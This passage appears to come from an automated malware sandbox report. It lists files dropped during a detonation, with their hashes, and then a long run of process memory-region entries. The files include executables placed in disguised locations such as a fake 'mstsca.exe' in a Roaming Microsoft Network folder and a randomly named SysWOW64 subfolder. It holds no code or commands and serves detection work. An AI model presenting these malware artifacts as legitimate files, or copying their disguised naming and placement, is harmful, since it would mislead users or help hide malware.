                                                                            2ee4847cd2405acad16628317d455a20715d1d4fecb71540a641c688c85a0d97

                                                                            SHA512

                                                                            36a70606a181a24d88aa3076f69f6927ec4ec9fc22435cfccaf032481d82e5bb7c1f4fe7e8f7938d7d7a69e68244cccb503218ca0ce19e2496f2c5b40692922f

                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            Filesize

                                                                            9KB

                                                                            MD5

                                                                            9ead10c08e72ae41921191f8db39bc16

                                                                            SHA1

                                                                            abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                                                            SHA256

                                                                            8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                                                            SHA512

                                                                            aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            Filesize

                                                                            9KB

                                                                            MD5

                                                                            9ead10c08e72ae41921191f8db39bc16

                                                                            SHA1

                                                                            abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                                                            SHA256

                                                                            8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                                                            SHA512

                                                                            aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                                                          • C:\Users\Admin\Desktop\Microsoft Edge.lnk
                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            fcb0f641ad03250cdd906fcdf2081f75

                                                                            SHA1

                                                                            683843b097c68d6648e40843fa505e1bfd98e0ae

                                                                            SHA256

                                                                            3bd616ad4ac571bd02f28952f9340e6d0a9ba785eb6b378b5d253a974aa56aeb

                                                                            SHA512

                                                                            f9d2122fbb56599a967529f383de84fe3317d7162330e695f87950b93f658f6fde49c4f0791af33196a480c34b00abb0fe9e0d489aee3664db597484f65e3d94

                                                                          • C:\Windows\SysWOW64\ssxcvnan\admjldtw.exe
                                                                            Filesize

                                                                            14.3MB

                                                                            MD5

                                                                            b4c616c8e20083bbc0921557ff23fc1b

                                                                            SHA1

                                                                            57ac71fec53ec90a41feb64ca60f1f7b94ccd281

                                                                            SHA256

                                                                            4c0b77382191a4197eece867512d62ec02e9c1b7524ea0147b698064a51f726f

                                                                            SHA512

                                                                            ce194bd29079d301734b51b183f88451b6c9cc1b9fe70ef154a6d0e8f83a3794b8e1ce8b6144761fa0952f366c9002277ce9001a09b14833b71dd6a21ff38f7f

                                                                          • \??\pipe\LOCAL\crashpad_103032_VPZOJMFCEYXVXTSH
                                                                            MD5

                                                                            d41d8cd98f00b204e9800998ecf8427e

                                                                            SHA1

                                                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                            SHA256

                                                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                            SHA512

                                                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                          • memory/492-414-0x0000000000000000-mapping.dmp
                                                                          • memory/680-392-0x0000000000000000-mapping.dmp
                                                                          • memory/836-155-0x0000000000000000-mapping.dmp
                                                                          • memory/836-159-0x0000000001360000-0x00000000013D5000-memory.dmp
                                                                            Filesize

                                                                            468KB

                                                                          • memory/836-160-0x00000000012F0000-0x000000000135B000-memory.dmp
                                                                            Filesize

                                                                            428KB

                                                                          • memory/836-162-0x00000000012F0000-0x000000000135B000-memory.dmp
                                                                            Filesize

                                                                            428KB

                                                                          • memory/900-170-0x0000000001FED000-0x000000000207F000-memory.dmp
                                                                            Filesize

                                                                            584KB

                                                                          • memory/900-171-0x00000000021E0000-0x00000000022FB000-memory.dmp
                                                                            Filesize

                                                                            1.1MB

                                                                          • memory/900-152-0x0000000000000000-mapping.dmp
                                                                          • memory/1272-206-0x0000000000000000-mapping.dmp
                                                                          • memory/1272-217-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                            Filesize

                                                                            364KB

                                                                          • memory/1272-209-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                            Filesize

                                                                            364KB

                                                                          • memory/1272-239-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                            Filesize

                                                                            364KB

                                                                          • memory/1272-207-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                            Filesize

                                                                            364KB

                                                                          • memory/1272-210-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                            Filesize

                                                                            364KB

                                                                          • memory/1272-218-0x0000000061E00000-0x0000000061EF3000-memory.dmp
                                                                            Filesize

                                                                            972KB

                                                                          • memory/1356-395-0x0000000000000000-mapping.dmp
                                                                          • memory/1624-189-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/1624-166-0x0000000000000000-mapping.dmp
                                                                          • memory/1624-169-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/1624-172-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/1624-173-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/1624-167-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/1700-196-0x0000000002046000-0x00000000020D8000-memory.dmp
                                                                            Filesize

                                                                            584KB

                                                                          • memory/1700-187-0x0000000000000000-mapping.dmp
                                                                          • memory/1752-213-0x0000000000000000-mapping.dmp
                                                                          • memory/1752-407-0x0000000000000000-mapping.dmp
                                                                          • memory/1960-388-0x0000000000000000-mapping.dmp
                                                                          • memory/2120-240-0x0000000000000000-mapping.dmp
                                                                          • memory/2148-249-0x0000000000000000-mapping.dmp
                                                                          • memory/2208-216-0x0000000000000000-mapping.dmp
                                                                          • memory/2384-409-0x0000000000000000-mapping.dmp
                                                                          • memory/2448-238-0x0000000000000000-mapping.dmp
                                                                          • memory/2836-412-0x0000000000000000-mapping.dmp
                                                                          • memory/3044-137-0x0000000000000000-mapping.dmp
                                                                          • memory/3076-139-0x0000000000000000-mapping.dmp
                                                                          • memory/3076-146-0x00000000007F9000-0x000000000080A000-memory.dmp
                                                                            Filesize

                                                                            68KB

                                                                          • memory/3076-148-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/3076-147-0x00000000006D0000-0x00000000006D9000-memory.dmp
                                                                            Filesize

                                                                            36KB

                                                                          • memory/3076-161-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/3108-157-0x0000000000000000-mapping.dmp
                                                                          • memory/3108-158-0x0000000000AE0000-0x0000000000AEC000-memory.dmp
                                                                            Filesize

                                                                            48KB

                                                                          • memory/3276-242-0x0000000000000000-mapping.dmp
                                                                          • memory/3316-191-0x0000000006DF0000-0x0000000006E0A000-memory.dmp
                                                                            Filesize

                                                                            104KB

                                                                          • memory/3316-190-0x0000000008110000-0x000000000878A000-memory.dmp
                                                                            Filesize

                                                                            6.5MB

                                                                          • memory/3316-174-0x0000000000000000-mapping.dmp
                                                                          • memory/3316-178-0x00000000061B0000-0x0000000006216000-memory.dmp
                                                                            Filesize

                                                                            408KB

                                                                          • memory/3316-181-0x00000000068E0000-0x00000000068FE000-memory.dmp
                                                                            Filesize

                                                                            120KB

                                                                          • memory/3316-175-0x00000000052C0000-0x00000000052F6000-memory.dmp
                                                                            Filesize

                                                                            216KB

                                                                          • memory/3316-176-0x0000000005A80000-0x00000000060A8000-memory.dmp
                                                                            Filesize

                                                                            6.2MB

                                                                          • memory/3316-179-0x0000000006220000-0x0000000006286000-memory.dmp
                                                                            Filesize

                                                                            408KB

                                                                          • memory/3424-399-0x0000000000000000-mapping.dmp
                                                                          • memory/3440-403-0x0000000000000000-mapping.dmp
                                                                          • memory/3580-192-0x0000000000000000-mapping.dmp
                                                                          • memory/3580-247-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/3580-202-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/3580-197-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/3580-195-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/3584-415-0x0000000000000000-mapping.dmp
                                                                          • memory/3648-384-0x0000000000000000-mapping.dmp
                                                                          • memory/3676-163-0x0000000005770000-0x0000000005792000-memory.dmp
                                                                            Filesize

                                                                            136KB

                                                                          • memory/3676-156-0x00000000007B0000-0x0000000000B8E000-memory.dmp
                                                                            Filesize

                                                                            3.9MB

                                                                          • memory/3676-149-0x0000000000000000-mapping.dmp
                                                                          • memory/3736-177-0x0000000000000000-mapping.dmp
                                                                          • memory/3756-134-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/3756-132-0x0000000000708000-0x0000000000719000-memory.dmp
                                                                            Filesize

                                                                            68KB

                                                                          • memory/3756-136-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/3756-135-0x0000000000708000-0x0000000000719000-memory.dmp
                                                                            Filesize

                                                                            68KB

                                                                          • memory/3756-133-0x00000000006E0000-0x00000000006E9000-memory.dmp
                                                                            Filesize

                                                                            36KB

                                                                          • memory/4028-248-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                            Filesize

                                                                            80KB

                                                                          • memory/4028-246-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                            Filesize

                                                                            80KB

                                                                          • memory/4028-244-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                            Filesize

                                                                            80KB

                                                                          • memory/4028-243-0x0000000000000000-mapping.dmp
                                                                          • memory/4424-182-0x0000000002990000-0x0000000002A38000-memory.dmp
                                                                            Filesize

                                                                            672KB

                                                                          • memory/4424-185-0x00000000028A0000-0x0000000002987000-memory.dmp
                                                                            Filesize

                                                                            924KB

                                                                          • memory/4424-164-0x0000000002680000-0x00000000027AC000-memory.dmp
                                                                            Filesize

                                                                            1.2MB

                                                                          • memory/4424-180-0x0000000002210000-0x00000000022CC000-memory.dmp
                                                                            Filesize

                                                                            752KB

                                                                          • memory/4424-165-0x00000000028A0000-0x0000000002987000-memory.dmp
                                                                            Filesize

                                                                            924KB

                                                                          • memory/4424-145-0x00000000022E0000-0x0000000002446000-memory.dmp
                                                                            Filesize

                                                                            1.4MB

                                                                          • memory/4424-141-0x0000000000000000-mapping.dmp
                                                                          • memory/4928-405-0x0000000000000000-mapping.dmp
                                                                          • memory/4928-211-0x0000000000898000-0x00000000008C2000-memory.dmp
                                                                            Filesize

                                                                            168KB

                                                                          • memory/4928-212-0x00000000006E0000-0x0000000000727000-memory.dmp
                                                                            Filesize

                                                                            284KB

                                                                          • memory/4928-203-0x0000000000000000-mapping.dmp
                                                                          • memory/4944-385-0x0000000000000000-mapping.dmp
                                                                          • memory/5060-241-0x0000000000000000-mapping.dmp
                                                                          • memory/5180-420-0x0000000000000000-mapping.dmp
                                                                          • memory/7412-264-0x0000000000640000-0x0000000000653000-memory.dmp
                                                                            Filesize

                                                                            76KB

                                                                          • memory/7412-297-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/7412-295-0x0000000000709000-0x000000000071A000-memory.dmp
                                                                            Filesize

                                                                            68KB

                                                                          • memory/7412-252-0x0000000000000000-mapping.dmp
                                                                          • memory/7412-265-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/7412-262-0x0000000000709000-0x000000000071A000-memory.dmp
                                                                            Filesize

                                                                            68KB

                                                                          • memory/14480-255-0x0000000000000000-mapping.dmp
                                                                          • memory/25764-258-0x0000000000000000-mapping.dmp
                                                                          • memory/25764-261-0x0000000000A80000-0x0000000000BA4000-memory.dmp
                                                                            Filesize

                                                                            1.1MB

                                                                          • memory/30088-263-0x0000000000000000-mapping.dmp
                                                                          • memory/36032-266-0x0000000000000000-mapping.dmp
                                                                          • memory/41592-268-0x0000000000000000-mapping.dmp
                                                                          • memory/42612-269-0x0000000000000000-mapping.dmp
                                                                          • memory/42620-274-0x0000000000E00000-0x0000000000E07000-memory.dmp
                                                                            Filesize

                                                                            28KB

                                                                          • memory/42620-272-0x0000000000000000-mapping.dmp
                                                                          • memory/42620-275-0x0000000000DF0000-0x0000000000DFB000-memory.dmp
                                                                            Filesize

                                                                            44KB

                                                                          • memory/46904-273-0x0000000000000000-mapping.dmp
                                                                          • memory/52112-279-0x0000000000AF0000-0x0000000000AFF000-memory.dmp
                                                                            Filesize

                                                                            60KB

                                                                          • memory/52112-276-0x0000000000000000-mapping.dmp
                                                                          • memory/52112-278-0x0000000000B00000-0x0000000000B09000-memory.dmp
                                                                            Filesize

                                                                            36KB

                                                                          • memory/52988-277-0x0000000000000000-mapping.dmp
                                                                          • memory/59416-281-0x0000000000000000-mapping.dmp
                                                                          • memory/59428-285-0x00000000008C0000-0x00000000008C9000-memory.dmp
                                                                            Filesize

                                                                            36KB

                                                                          • memory/59428-280-0x0000000000000000-mapping.dmp
                                                                          • memory/59428-283-0x00000000008D0000-0x00000000008D5000-memory.dmp
                                                                            Filesize

                                                                            20KB

                                                                          • memory/60580-290-0x0000000000783000-0x0000000000794000-memory.dmp
                                                                            Filesize

                                                                            68KB

                                                                          • memory/60580-293-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/60580-302-0x0000000000400000-0x0000000000585000-memory.dmp
                                                                            Filesize

                                                                            1.5MB

                                                                          • memory/64560-284-0x0000000000000000-mapping.dmp
                                                                          • memory/64560-288-0x0000000000170000-0x000000000017C000-memory.dmp
                                                                            Filesize

                                                                            48KB

                                                                          • memory/64560-287-0x0000000000180000-0x0000000000186000-memory.dmp
                                                                            Filesize

                                                                            24KB

                                                                          • memory/70872-286-0x0000000000000000-mapping.dmp
                                                                          • memory/70872-289-0x0000000000970000-0x0000000000997000-memory.dmp
                                                                            Filesize

                                                                            156KB

                                                                          • memory/70872-303-0x00000000009A0000-0x00000000009C2000-memory.dmp
                                                                            Filesize

                                                                            136KB

                                                                          • memory/72900-300-0x00000000007B0000-0x00000000007C5000-memory.dmp
                                                                            Filesize

                                                                            84KB

                                                                          • memory/72900-349-0x0000000001DE0000-0x0000000001DE7000-memory.dmp
                                                                            Filesize

                                                                            28KB

                                                                          • memory/72900-334-0x0000000002600000-0x000000000280F000-memory.dmp
                                                                            Filesize

                                                                            2.1MB

                                                                          • memory/72900-337-0x00000000009C0000-0x00000000009C6000-memory.dmp
                                                                            Filesize

                                                                            24KB

                                                                          • memory/72900-291-0x0000000000000000-mapping.dmp
                                                                          • memory/72900-292-0x00000000007B0000-0x00000000007C5000-memory.dmp
                                                                            Filesize

                                                                            84KB

                                                                          • memory/72900-340-0x00000000009E0000-0x00000000009F0000-memory.dmp
                                                                            Filesize

                                                                            64KB

                                                                          • memory/72900-343-0x00000000009F0000-0x00000000009F5000-memory.dmp
                                                                            Filesize

                                                                            20KB

                                                                          • memory/72900-346-0x0000000007580000-0x000000000798B000-memory.dmp
                                                                            Filesize

                                                                            4.0MB

                                                                          • memory/75140-301-0x0000000000340000-0x0000000000345000-memory.dmp
                                                                            Filesize

                                                                            20KB

                                                                          • memory/75140-305-0x0000000000330000-0x0000000000339000-memory.dmp
                                                                            Filesize

                                                                            36KB

                                                                          • memory/75140-298-0x0000000000000000-mapping.dmp
                                                                          • memory/76792-299-0x0000000000000000-mapping.dmp
                                                                          • memory/81360-304-0x0000000000000000-mapping.dmp
                                                                          • memory/81360-309-0x00000000008B0000-0x00000000008BB000-memory.dmp
                                                                            Filesize

                                                                            44KB

                                                                          • memory/81360-308-0x00000000008C0000-0x00000000008C6000-memory.dmp
                                                                            Filesize

                                                                            24KB

                                                                          • memory/87912-307-0x0000000000000000-mapping.dmp
                                                                          • memory/87912-313-0x00000000001E0000-0x00000000001E7000-memory.dmp
                                                                            Filesize

                                                                            28KB

                                                                          • memory/87912-310-0x00000000001D0000-0x00000000001DD000-memory.dmp
                                                                            Filesize

                                                                            52KB

                                                                          • memory/95948-314-0x0000000000D90000-0x0000000000D98000-memory.dmp
                                                                            Filesize

                                                                            32KB

                                                                          • memory/95948-312-0x0000000000000000-mapping.dmp
                                                                          • memory/100212-317-0x0000000000400000-0x0000000000428000-memory.dmp
                                                                            Filesize

                                                                            160KB

                                                                          • memory/100212-316-0x0000000000000000-mapping.dmp
                                                                          • memory/102660-352-0x0000000000000000-mapping.dmp
                                                                          • memory/102660-353-0x00000000004E1000-0x00000000005B2000-memory.dmp
                                                                            Filesize

                                                                            836KB

                                                                          • memory/102660-355-0x00000000004E0000-0x00000000005D1000-memory.dmp
                                                                            Filesize

                                                                            964KB

                                                                          • memory/102944-370-0x0000000000000000-mapping.dmp
                                                                          • memory/103032-371-0x0000000000000000-mapping.dmp
                                                                          • memory/103060-372-0x0000000000000000-mapping.dmp
                                                                          • memory/103128-373-0x0000000000000000-mapping.dmp
                                                                          • memory/103204-379-0x0000000140003FEC-mapping.dmp